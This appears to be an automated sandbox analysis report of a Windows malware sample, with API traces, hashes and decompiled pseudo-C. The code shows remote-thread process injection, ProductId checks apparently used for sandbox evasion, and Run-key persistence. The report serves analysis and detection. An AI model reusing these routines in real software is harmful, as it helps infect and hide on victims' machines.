                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004012B8, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				CHAR* _t8;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t8 = CharNextA(_t22); // executed
							_t22 = _t8;
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00402074(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}




















                                    0x004012bc
                                    0x004012be
                                    0x004012ca
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012ca
                                    0x004012ca
                                    0x004012ce
                                    0x004012c8
                                    0x004012c8
                                    0x004012d4
                                    0x004012d7
                                    0x004012e4
                                    0x004012e6
                                    0x0040132d
                                    0x0040132d
                                    0x00401331
                                    0x00000000
                                    0x00000000
                                    0x004012ec
                                    0x00401320
                                    0x00401329
                                    0x0040132b
                                    0x00000000
                                    0x0040132b
                                    0x004012ef
                                    0x004012f4
                                    0x00401306
                                    0x00401306
                                    0x0040130a
                                    0x00000000
                                    0x00000000
                                    0x004012f9
                                    0x00401302
                                    0x00401304
                                    0x00401304
                                    0x00401313
                                    0x0040131b
                                    0x0040131b
                                    0x00401313
                                    0x00401337
                                    0x0040133c
                                    0x0040133e
                                    0x00401340
                                    0x00401395
                                    0x00401395
                                    0x00401399
                                    0x00000000
                                    0x00000000
                                    0x00401346
                                    0x00401381
                                    0x00401388
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040138a
                                    0x0040138a
                                    0x0040138c
                                    0x0040138f
                                    0x00401390
                                    0x00401391
                                    0x00000000
                                    0x0040138a
                                    0x0040134e
                                    0x00401367
                                    0x00401367
                                    0x0040136b
                                    0x00000000
                                    0x00000000
                                    0x00401353
                                    0x0040135a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040135c
                                    0x0040135c
                                    0x0040135e
                                    0x00401361
                                    0x00401362
                                    0x00401363
                                    0x0040135c
                                    0x00401374
                                    0x0040137c
                                    0x0040137c
                                    0x00401374
                                    0x004013a1
                                    0x004012df
                                    0x004012df
                                    0x00000000
                                    0x004012df
                                    0x004012d7

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403954, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t30;
				intOrPtr _t37;
				void* _t40;
				void* _t43;

				_t30 = __ecx;
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t40 = __eax;
				E00401F38(_v8);
				_push(_t43);
				_push(0x4039f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
				_v16 = _t20;
				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
				if(_t22 != 0) {
					CloseHandle(_t22);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E004039F9);
				return E00401AC0( &_v8);
			}













                                    0x00403954
                                    0x0040395a
                                    0x0040395b
                                    0x0040395c
                                    0x0040395f
                                    0x00403964
                                    0x0040396b
                                    0x0040396c
                                    0x00403971
                                    0x00403974
                                    0x0040398e
                                    0x004039a6
                                    0x004039b5
                                    0x004039ba
                                    0x004039cb
                                    0x004039d2
                                    0x004039d5
                                    0x004039da
                                    0x004039de
                                    0x004039e1
                                    0x004039e4
                                    0x004039f1

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004053EC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004053EC() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}








                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • ProductId, xrefs: 00405423
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004054A4() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272); // executed
				return _t15;
			}








                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • ProductId, xrefs: 004054DB
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406B54, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 380fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t112;
				void* _t126;
				intOrPtr* _t143;
				void* _t154;
				void* _t166;
				CHAR* _t169;
				int _t172;
				int _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t204;
				intOrPtr* _t218;
				intOrPtr* _t226;
				intOrPtr* _t240;
				intOrPtr* _t248;
				intOrPtr* _t258;
				intOrPtr* _t272;
				intOrPtr* _t284;
				intOrPtr _t301;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr* _t315;
				intOrPtr* _t317;
				void* _t321;
				intOrPtr* _t332;
				intOrPtr _t333;
				intOrPtr* _t334;
				intOrPtr* _t338;
				char _t340;
				intOrPtr _t351;
				CHAR* _t392;
				CHAR* _t394;
				intOrPtr _t396;
				intOrPtr _t397;
				void* _t402;

				_t393 = __esi;
				_t391 = __edi;
				_t396 = _t397;
				_t314 = 0xf;
				do {
					_push(0);
					_push(0);
					_t314 = _t314 - 1;
				} while (_t314 != 0);
				_push(_t314);
				_push(__esi);
				_push(__edi);
				_t313 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t396);
				_push(0x407061);
				_push( *[fs:eax]);
				 *[fs:eax] = _t397;
				E00401B14(_t313, _v8);
				_t106 =  *0x40d1f0; // 0x40e890
				_t399 =  *_t106;
				if( *_t106 != 0) {
					_t107 =  *0x40d1f0; // 0x40e890
					__eflags =  *_t107 - 1;
					if(__eflags != 0) {
						_t108 =  *0x40d1f0; // 0x40e890
						__eflags =  *_t108 - 2;
						if(__eflags != 0) {
							_t109 =  *0x40d1f0; // 0x40e890
							__eflags =  *_t109 - 3;
							if(__eflags != 0) {
								_t110 =  *0x40d218; // 0x40e894
								_t112 = E00401D50( *_t110);
								_t332 =  *0x40d218; // 0x40e894
								_t333 =  *_t332;
								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
									_t301 =  *0x40d218; // 0x40e894
									E00401D58(_t301, 0x407078);
								}
								_t334 =  *0x40d218; // 0x40e894
								E00401B58( &_v12,  *_t334);
								E00401CAC( &_v28, E00401F48(_v12));
								E00406684(_v28, _t313, __eflags);
							} else {
								E004061DC( &_v12, _t313, __esi, __eflags);
							}
						} else {
							E00406034( &_v12, _t313, __eflags);
						}
					} else {
						E00405F7C( &_v12, _t313, __eflags);
					}
				} else {
					E00405EF0( &_v12, _t313, _t399);
				}
				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t338 =  *0x40d208; // 0x40e898
				E00401D58( &_v12,  *_t338);
				_t126 = E00401D50(_v12);
				_t340 = _v12;
				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t315 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v16,  *_t315, _v12);
				E00401CAC( &_v32, E00401F48(_v12));
				E00406684(_v32, _t313, _t401); // executed
				E00401CAC( &_v36, E00401F48(_v16));
				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
				E00405BEC( &_v40, _t313, _t393, _t401); // executed
				_push(_v40);
				_push(0x407078);
				_t143 =  *0x40d208; // 0x40e898
				_push( *_t143);
				E00401E10();
				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
				if(_t402 != 0) {
					E00401D58( &_v20, 0x407078);
				}
				_t317 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v24,  *_t317, _v20);
				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
				_push(_v44);
				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
				_pop(_t154);
				E00401E94(_t154, _v48);
				if(_t402 == 0) {
					L21:
					E00401B14(_t313, _v8);
					goto L40;
				} else {
					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
					_push(_v52);
					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
					_pop(_t166);
					E00401E94(_t166, _v56);
					if(_t402 != 0) {
						_t169 = E00401F48(_v16);
						_t394 = E00401F48(_v8);
						_t172 = CopyFileA(_t394, _t169, 0);
						__eflags = _t172 - 1;
						asm("sbb eax, eax");
						__eflags = _t172 + 1 - 1;
						if(_t172 + 1 != 1) {
							E00401CAC( &_v60, E00401F48(_v20));
							E00406684(_v60, _t313, __eflags);
							_t392 = E00401F48(_v24);
							E00401CAC( &_v64, _t392);
							E00405A28(_v64, _t313, _t392, _t394, __eflags);
							_t186 = CopyFileA(_t394, _t392, 0);
							__eflags = _t186 - 1;
							asm("sbb eax, eax");
							__eflags = _t186 + 1 - 1;
							if(_t186 + 1 != 1) {
								E00401B14(_t313, _v8);
							} else {
								E00401B14(_t313, _v24);
							}
						} else {
							E00401B14(_t313, _v16);
						}
						_t190 =  *0x40d1ec; // 0x40e8ac
						__eflags =  *_t190;
						if( *_t190 != 0) {
							_t248 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v72, E00401F48( *_t248));
							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
							E00401E94(_v68,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v76, E00401F48( *_t313));
								_t284 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v80, E00401F48( *_t284));
								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76);
							}
							_t258 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v88, E00401F48( *_t258));
							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0);
							E00401E94(_v84,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v92, E00401F48( *_t313));
								_t272 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v96, E00401F48( *_t272));
								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
							}
						}
						_t191 =  *0x40d1d8; // 0x40e8a4
						__eflags =  *_t191;
						if( *_t191 != 0) {
							_t226 =  *0x40d1d8; // 0x40e8a4
							E00401CAC( &_v104, E00401F48( *_t226));
							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0);
							E00401E94(_v100,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v108, E00401F48( *_t313));
								_t240 =  *0x40d1d8; // 0x40e8a4
								E00401CAC( &_v112, E00401F48( *_t240));
								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
							}
						}
						_t192 =  *0x40d1e0; // 0x40e8a8
						__eflags =  *_t192;
						if( *_t192 != 0) {
							_t204 =  *0x40d1e0; // 0x40e8a8
							E00401CAC( &_v120, E00401F48( *_t204));
							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0);
							E00401E94(_v116,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v124, E00401F48( *_t313));
								_t218 =  *0x40d1e0; // 0x40e8a8
								E00401CAC( &_v128, E00401F48( *_t218));
								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
							}
						}
						_t193 =  *0x40d1e4; // 0x40e8a0
						__eflags =  *_t193;
						if( *_t193 != 0) {
							_push(0x4070fc);
							_push(E00406840(1));
							_push(E00401F48( *_t313));
							_t198 =  *0x40d1e4; // 0x40e8a0
							_t200 = E00401F48( *_t198);
							_pop(_t321);
							_pop(_t201);
							E00406ADC(_t201, _t321, _t200, __eflags);
						}
						L40:
						_pop(_t351);
						 *[fs:eax] = _t351;
						_push(E00407068);
						return E00401AE4( &_v128, 0x1f);
					}
					goto L21;
				}
			}















































































                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
